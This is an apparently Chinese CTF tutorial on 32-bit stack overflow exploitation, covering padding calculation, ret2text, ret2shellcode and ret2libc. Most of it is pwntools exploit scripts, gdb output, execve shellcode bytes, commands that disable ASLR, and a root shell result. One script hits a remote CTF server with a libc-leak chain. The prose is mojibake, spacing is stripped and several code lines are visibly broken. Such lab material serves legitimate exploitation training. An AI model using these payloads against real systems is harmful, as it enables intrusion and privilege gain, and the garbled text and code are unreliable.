PWN-鏍堟孩鍑轰粙缁嶆孩鍑簆adding璁$畻鏂规硶涓€锛歟sp/ebp璺濈璁$畻婧㈠嚭鍑芥暟鏂偣b涓昏褰昬sp,ebpEBP:0xbffff508-->0x0ESP:0xbffff480-->0x0鏌ユ壘婧㈠嚭鍑芥暟鍙傛暟浣嶇疆0x804858c:leaeax,[esp+0x1c]padding=(ebp-(esp+1c))+4=(0xbffff508-0xbffff480-0x1c)+4=112鏂规硶浜岋細pattern_create閫氬父ebp+4/rbp+8鏇村噯纭?鈿橻!]Pwntools涓嶆敮鎸?2浣峆ython銆備娇鐢?4浣嶇増鏈€傗攲鈹€鈹€(root馃拃kali)-[/home/kali/Desktop/CTF]鈹斺攢鈹€#gdbret2shellcode1鈿檊db-peda$runStartingprogram:/home/kali/Desktop/CTF/ret2shellcode杩欐娌℃湁閫傚悎浣犵殑绯荤粺锛?!aaaabaaacaaadaaaeaaaafaaagaaahaaaaiaaajaaakaaalaaamaaanaaaaoaaapaaaaaaqaaaaaaaaaaaaaaaaaaavaaaaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabbyebye~ProgramreceivedsignalSIGSEGV,Segmentationfault.----------------------------------]EAX:0x0EBX:0x0ECX:0x9('\t')EDX锛?xffffffffESI:0xb7fb0000-->0x1e4d6cEDI:0xb7fb0000-->0x1e4d6cEBP:0x62616163('caab')ESP:0xbffff510("eaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")EIP:0x62616164('daab')EFLAGS:0x10282(carryparityadjustzeroSIGNtrapINTERRUPT鏂瑰悜婧㈠嚭锛塠------------------------------------浠g爜----------------------------------]鏃犳晥鐨?PC鍦板潃锛?x62616164鍥句緥锛氫唬鐮併€佹暟鎹€乺odata銆乿alueStopped鍘熷洜锛歋IGSEGV0x62616164鍦??()gdb-peda$zsh:鏆傚仠gdbret2shellcode鈹屸攢鈹€(root馃拃kali)-[/home/kali/Desktop/CTF]鈹斺攢鈹€#cyclic-l"0x62616164"148猕?鈿橻!]Pwntools涓嶆敮鎸?2浣峆ython銆備娇鐢?4浣嶇増鏈€?12鍫嗘爤婧㈠嚭浣跨敤ret2textret2text鏄墽琛岀幇鏈変唬鐮?.text)鐨勬帶鍒剁▼搴忕ず渚?/gcc-m32-fno-stack-protector-no-pieret2text.c-oret2text#include#includevoidsuccess(){puts("SUCCESS!!!");system("catflag");}voidvulnerable(){chars[12];寰楀埌锛圫锛?鐪嬭穼鏈熸潈锛況eturn;}intmain(intargc,char**argv){鏄撳彈鏀诲嚮鐨?);return0;}.text鏈塮lag閿俊鎭嚱鏁拌绠楁孩鍑洪暱搴xxxxpython浠g爜frompwnimport*sh=process("./ret2text")win=0x8049182sh.sendline(b'A'*24+p32(win))sh.interactive()ret2shellcode鍥?鍥?闂锛氬浣曠‘瀹歴hellcode鐨勮捣濮嬪湴鍧€鍏抽棴ASLRASLR锛堢郴缁熷惎鐢級ASLR鏄竴绉嶉槻姝㈢紦鍐插尯婧㈠嚭鐨勫畨鍏ㄤ繚鎶ゆ妧鏈紝閫氳繃闅忔満鍖栫嚎鎬у尯鍩熺殑甯冨眬锛屽鍫嗐€佹爤銆佸叡浜簱鏄犲皠锛屽苟閫氳繃澧炲姞鏀诲嚮鑰呴娴嬬洰鏍囧湴鍧€鐨勯毦搴︼紝浠庤€岄槻姝㈡敾鍑昏€呯洿鎺ュ畾浣嶅埌鏀诲嚮浠g爜鐨勪綅缃紝浠庤€岄槻姝㈡孩鍑烘敾鍑汇€傚湪Linux涓娇鐢ㄨ鎶€鏈悗锛屾潃鎺夋煇涓▼搴忥紝閲嶅惎锛屾洿鏀瑰湴鍧€銆傚湪windows涓娇鐢ㄨ鎶€鏈悗锛屾潃鎺夎繘绋嬪悗閲嶅惎锛屽湴鍧€涓嶄細鏀瑰彉锛岄噸鍚悗鎵嶄細鏀瑰彉銆備笂闈at鍛戒护杈撳嚭鐨勫€艰〃绀猴細0鈥斺€旇〃绀哄叧闂繘绋嬪湴鍧€绌洪棿闅忔満鍖栥€?-琛ㄧず闅忔満鍖杕map銆佸爢鏍堝拰vdso椤甸潰鐨勫熀鍦板潃銆?-鎰忔€濇槸鍦?鐨勫熀纭€涓婂鍔犳爤锛堝爢锛夌殑闅忔満鍖栥€俥cho0>/proc/sys/kernel/randomize_va_spaceecho1>/proc/sys/kernel/core_uses_pid绀轰緥#includevoidvuln_func(){charbuf[128];璇诲彇锛圫TDIN_FILENO锛宐uf锛?56锛夛紱}intmain锛坴oid锛墈vuln_func锛堬級锛涘啓锛圫TDOUT_FILENO锛屸€滀綘濂戒笘鐣岋紒\n鈥濓紝13锛?}1銆俥xecuteoverflow鍒ゆ柇婧㈠嚭鍦板潃浠ュ強涓轰粈涔坈ore鏂囦欢鏄?esp-140-4鍥犱负姝ゆ椂鐨別sp鎸囧悜鍑芥暟杩斿洖鍦板潃ret鎵ц鍚庡嚱鏁版姤閿欙紝鎵€浠ユ鏃朵唬鐮佸凡缁忔墽琛屼簡ret,涔熷氨鏄esp鎸囧悜(杩斿洖鍦板潃+4)鈹屸攢鈹€(root馃拃kali)-[/home/kali/Desktop/CTF]鈹斺攢#gdbstack3core.2936-q1鈿欎粠stack3璇诲彇绗﹀彿...锛堝湪stack3涓湭鎵惧埌璋冭瘯绗﹀彿锛塠NewLWP2936]Core鐢盽./stack3'鐢熸垚銆傜▼搴忓洜淇″彿SIGSEGV銆佸垎娈甸敊璇€岀粓姝€?00xbf91afc0in??()gdb-peda$x/4wx$esp-140-40xbffff4c0:0x2f68686a0x68732f2f0x6e69622f0x0168e389gdb-peda$zsh:鏆傚仠gdbstack3core.2936-q#!/usr/bin/envpythonfrompwnimport*sh=process('./stack3')#鏂规硶1shellcode=asm(shellcraft.sh())buf2_addr=0xbffff4c0print(shellcode)pause()sh.sendline(shellcode+b'B'*(140-len(shellcode))+p32(buf2_addr))sh.interactive()鏂规硶2锛氣攲鈹€鈹€(root馃拃kali)-[/home/kali/Desktop/CTF]鈹斺攢#gdbstack3core.2961-q6鈿橰eadingsymbolsfromstack3...(Nodebuggingsymbolsfoundinstack3)[NewLWP2961]Corewasgeneratedby`./stack3'.Programterminatedwith淇″彿SIGSEGV锛屽垎娈甸敊璇€?00xbf91afc0in??()gdb-peda$x/4wx$esp0xbffff550:0xbffff50a0x000000000x000000000xb7de9e46gdb-peda$#!/usr/bin/envpythonfrompwnimport*sh=process('./stack3')#鏂规硶2buf2_addr=0xbffffes550#鍊兼墦鍗?shellcode)pause()sh.sendline(b'b'*140+p32(buf2_addr)+shellcode)sh.interactive()鈹屸攢鈹€(root馃拃kali)-[/home/kali/Desktop/CTF]鈹斺攢鈹€#python3stack3.py3鈿橻!]Pwntools涓嶆敮鎸?2浣峆ython銆備娇鐢?4浣嶇増鏈€俒+]鍚姩鏈湴杩涚▼'./stack3':pid3037b'jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80'[*]鍒囨崲鍒颁氦浜掓ā寮?iduid=0(root)gid=0(root)groups=0(root),143(kaboxer)$[*]Interrupted[*]Stoppedprocess'./stack3'(pid3037)ret2libc渚?IDA鍒嗘瀽sh_addr=0x08048720system_addr=0x08048460padding=112expfrompwnimport*sh=process("./ret2libc1")binsh=0x08048720system_plt044addr08=80x00x11111111payload=b"a"*112payload+=p32(system_plt)payload+=p32(whatever_addr)#杩欓噷鏄皟鐢╯ystem鐨勮繑鍥炲湴鍧€锛屾病鏈夊疄闄呮剰涔塸ayload+=p32(binsh)sh.sendline(payload)sh.interactive()渚?checksecxxxxxcalculationpadding=112.bssbuf2=0x0804A080gets=08048460system=08048490鏍堟儏鍐靛垎鏋恊xpfrompwnimport*sh=process("./ret2libc2")get_addr=0x08048460buf_addr=0x0804A080system_addr=0x08048490payload=b"Q"*112payload+=p32(get_addr)payload+=p32(system_addr)2payload+payload+=p32(buf_addr)sh.sendline(payload)sh.sendline("/bin/sh")sh.interactive()exp2frompwnimport*sh=process("./ret2libc2")elf=ELF("./ret2libc2")get_addr=elf.plt['gets']system_addr=elf.plt['system']buf_addr=elf.symbols['buf2']payload=b"Q"*112payload+=p32(get_addr)payload+=p32(system_addr)payload+=p32(buf_addr)payload+=p32(buf_addr)sh.sendline(payload)sh.sendline("/bin/sh")sh.interactive()渚?鍑芥暟鍩哄潃base=A鍑芥暟寰楀埌-A鍑芥暟libc=B鍑芥暟寰楀埌-B鍑芥暟ionlibcxctflevel3libc_write=0x000D43C0libc_system=0x0003A940libc_bin=0x0015902B1銆傛潵鑷猵wn鍗虫椂娑堟伅绔彛*2.3.p=remote('111.200.241.244',65388)4.elf=ELF('./level3')5.libc=ELF('./libc_32.so.6')6.7.write_plt=elf.plt['write']8.write_got=elf.got['write']9.main_addr=elf.sym['main']10.11.p.recvuntil(":\n")12.payload1=b'A'*(0x88+4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)13.p.sendline(payload1)14.15.write_got_addr=u32(p.recv())16.17.libc_write=0x000D43C018.libc_system=0x0003A94019.libc_bin=0x0015902B20.21.#libc_base=write_got_addr-libc.sym['write']22.libc_base=write_got_addr-libc_write23.system_addr=libc_base+libc_system24.#system_addr=libc_base+libc.sym['system']25.26.bin_sh_addr=libc_base+0x15902b27.payload2=b'A'*(0x88+4)+p32(system_addr)+p32(0x12341234)+p32(bin_sh_addr)28.p.recvuntil(":\n")29.p.sendline(payload2)30.p.interactive()
